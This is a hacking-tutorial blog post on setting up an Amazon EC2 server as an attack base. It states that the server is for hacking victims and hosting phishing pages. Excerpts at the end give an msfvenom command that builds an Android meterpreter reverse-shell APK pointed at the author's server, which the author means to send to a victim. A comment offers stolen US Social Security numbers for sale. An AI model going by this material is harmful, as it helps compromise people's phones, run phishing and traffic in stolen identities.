Skip to main content

How to create Amazon EC2 (VPS) for Hacking Purpose

How to create Amazon EC2 (VPS) for Hacking Purpose

To create EC2 on Amazon you mus have an account on Amazon AWS.
You can see my tutorial on creating account on Amazon AWS.
Watch Tutorial Now


Steps to create EC2 :-
1. After successful login to your Amazon AWS account Click on Services (seeimage) and then EC2.




2.Then click on Launch Instance .(see image)



3.On next Page you have to choose AMI (Amazon Machine Image) (See image).
4. There are many AMI. I will recommend to use Ubuntu Server 16.04 (64-bit) by scrolling the page.

5. Now click SELECT. ...  On next Step 2 , Choose Instance Type (see image)...must select free tier eligible.



6.note:- donot launch it now....Click on "Next:Configure Instance Details".(important point)

7. Now new page will open. Donot change any think and click next and skip step 4 and 5.
    to "Configure Security Group".  (See image).


8.On this page Click on Add Rule (see image).


9.After clicking on it new rule will be added, configure it as i have done (see image).
  select :- All Traffic and Anywhere..... and Delete the previous rule (by Default).


after doing this step 9 this page must look like ↓↓↓↓↓↓ (see image).


10. Now click on Review and Launch.

11. Here you will be ask to download a key (which will act as a password to your EC2 while connecting to it ...)  (see image).



12.And finally click Launch Instances...

after doing this Step 12....you have successfully launched a Ubuntu EC2 (VPS), which will always remain online with a public and static ip...in my case it is 54.7189.249 . (see image)

In image you can see EC2 have no name, you can give it name by right clicking on it.


Part 2 : Connecting your PC or Local Computer to your EC2.
   
Whenever we want to hack our victim we need to connect our ec2 (online ubuntu OS)...
let do it..

If you are Windows user Follow this steps :-

  • Download putty from here :-> DOWNLOAD PUTTY.
  • After downloading it install it on your PC.
  • now run puTTYgen.exe
  • and click LOAD See image



  • now select the key you have downloaded earlier..anything.pem.



  • now click on save private key and close puTTYgen.exe
  • Now open puTTY.exe to connect.
  • enter username :- ubuntu  and ip address
  • example ubuntu@54.71.89.249  (see image)






  • now click on SSH and browse fow key you have saved using puTTYgen.exe (see image)


And last step Click Open .

it will open a terminal connected to your  ubuntu.(see image)


Now you can use all commands and exploit on this terminal...

you can also check tutorial how to install Metasploit on this EC2 ...
SEE TUTORIAL


 Benefit of static ip:-
  • You will never lose your victim (Hacking purpose).   
  • You may create phising pages by starting various servers on your Instance.
  • You do not need any router or port forwarding.
  •  You can hack any time with any system just by connecting to your Instance.
     
    ANY QUESTION OR PROBLEM COMMENT  BELOW OR IF YOU WANTED TO      KNOW MORE ABOUT VPS PLEASE COMMENT BELOW.....
 Note :- Most of the hacker use this technique to hacker there victim.....
           

















Comments

  1. Great blog post... I found this information very useful. I want more information on EC2 backup. Thanks for sharing

    ReplyDelete
  2. This blog gives very important info about AWS,Thanks for sharing
    AWS Online Training

    ReplyDelete
  3. Hi Clients!

    We have fresh and valid usa ssn leads
    100% good and valid leads
    *If you have any trust issue before any deal you may get few to test
    *Every leads are well checked and available 24 hours

    ****Contact Me****
    *ICQ :748957107

    *Gmail :taimoorh944@gmail.com


    Cost for Premuim lead $5 for each
    Cost for normal lead $2 for each
    Price can be negotiable if order in bulk

    *please contact soon!
    *I hope a long term deal
    *Thank You

    ReplyDelete

Post a Comment

Popular posts from this blog

How to install Metasploit on Ubuntu or Ubuntu (VPS)

How to install Metasploit on Ubuntu or Ubuntu (VPS) First of all connect to your EC2 Instance . You may see Tutorial On how to create and connect to EC2 (VPS). SEE TUTORIAL. Installing Metasploit :- After connecting to your EC2 just copy and paste the code from below ↓↓↓↓. wget https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run && wget https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1 && echo $(cat metasploit-latest-linux-x64-installer.run.sha1)' 'metasploit-latest-linux-x64-installer.run > metasploit-latest-linux-x64-installer.run.sha1 && shasum -c metasploit-latest-linux-x64-installer.run.sha1 && chmod +x ./metasploit-latest-linux-x64-ins taller.run && sudo ./metasploit-latest-linux-x64-installer.run Now follow the on Screen instruction and JUST press ENTER and "Y".  When ever asked. it will ask you folder to install

[No Portforwarding] How to hack Android Mobile Using Metsploit ( Over WAN using VPS)

[No Portforwarding] How to hack Android Mobile Using Metsploit ( Over WAN using VPS) Hello people, If you are facing problem in Port Forwarding, No-Ip hosting..etc then you are at right place... because in this technique we will use our VPS [how to create VPS see my tutorial here ] In this tutorial we will hack android mobile over WAN using our VPS(Virtual Private Server). Lets Begin: First of All you need to see this 3 Tutorials On : how to create AWS amazon account. [ click here ] how to create EC2 (VPS) on ammazon. [ click here ] how to install metasploit on EC@ (VPS). [ click here ] now connect to your EC2(VPS) usig puTTY.exe type this command in terminal to create payload  msfvenom -p android/meterpreter/reverse_tcp LHOST= 54.71.89.249 R > hack.apk Here lhost will be your EC2 (VPS) public IP address (in my case it is 54.71.89.249)(see image) by this command you will create apk named "hack.apk". Now you have to transfer this apk to your v